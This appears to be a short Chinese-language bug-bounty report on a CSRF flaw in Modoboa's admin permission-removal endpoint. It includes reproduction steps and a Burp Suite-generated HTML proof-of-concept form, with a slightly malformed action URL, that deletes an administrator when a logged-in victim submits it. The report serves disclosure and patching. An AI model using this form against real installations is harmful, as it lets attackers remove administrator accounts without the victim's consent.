remove 函数易受 CSRF 攻击导致删除任何管理员用户 GET /admin/permissions/remove/?domid=2&daid=15

1. / 访问 /admin/domains/1/

2. /删除按钮移除权限易受CSRF攻击

   https://drive.google.com/file/d/1fs_2MID6uT_f7rvjJQYK_m-e6q39PMez/view?usp=sharing

3.  通过更改值访问 POC 将删除管理员用户名

<html>  <!-- CSRF PoC - generated by Burp Suite Professional -->  <body>  <script>history.pushState('', '', '/')</script>    <form action="https//l27.0.0.1/admin/permissions/remove/">      <input type="hidden" name="domid" value="2" />      <input type="hidden" name="daid" value="15" />      <input type="submit" value="Submit request" />    </form>  </body></html>

https://github.com/modoboa/modoboa/commit/38d778cc71e370216e067d054ce0169ad83078c8

通过删除中的管理用户名导致相同的结果

https://huntr.dev/bounties/0a852351-00ed-44d2-a650-9055b7beed58/

https://huntr.dev/bounties/d7007f76-3dbc-48a7-a2fb-377040fe100c/

允许攻击者诱使用户执行他们不打算执行的操作